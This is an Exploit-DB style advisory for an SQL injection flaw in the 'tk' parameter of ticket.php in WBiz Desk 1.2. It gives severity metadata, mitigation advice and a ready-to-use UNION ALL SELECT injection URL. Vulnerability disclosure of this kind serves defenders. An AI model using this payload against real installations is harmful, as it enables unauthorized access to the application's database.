WBiz Desk 1.2 - SQL Injection

vendor:

WBiz Desk

by:

h4ck3r - Faisal Albuloushi

6.4

CVSS

MEDIUM

SQL Injection

CWE

Product Name: WBiz Desk

Affected Version From: WBiz Desk 1.2

Affected Version To: WBiz Desk 1.2

Patch Exists: NO

Related CWE:

CPE: a:wbiz_desk:wbiz_desk:1.2

Metasploit:

Other Scripts:

Platforms Tested:

2023

WBiz Desk 1.2 – SQL Injection

The WBiz Desk 1.2 application is vulnerable to SQL Injection. An attacker can exploit the 'ticket.php' page by injecting malicious SQL code into the 'tk' parameter, allowing them to execute arbitrary SQL queries.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Implementing parameterized queries or using prepared statements can also help prevent SQL Injection attacks.

Source

Exploit-DB raw data:

[#] Exploit Title: WBiz Desk 1.2 - SQL Injection
[#] Exploit Date: May 12, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: WBiz Desk
[#] Application Version: 1.2
[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system


[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech


[#] 3xploit:

[path]//ticket.php?tk=[SQL Injection]


[#] 3xample:

[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -


[#] Notes:
- The vulnerability requires a non-admin privilege (normal) user to be exploited.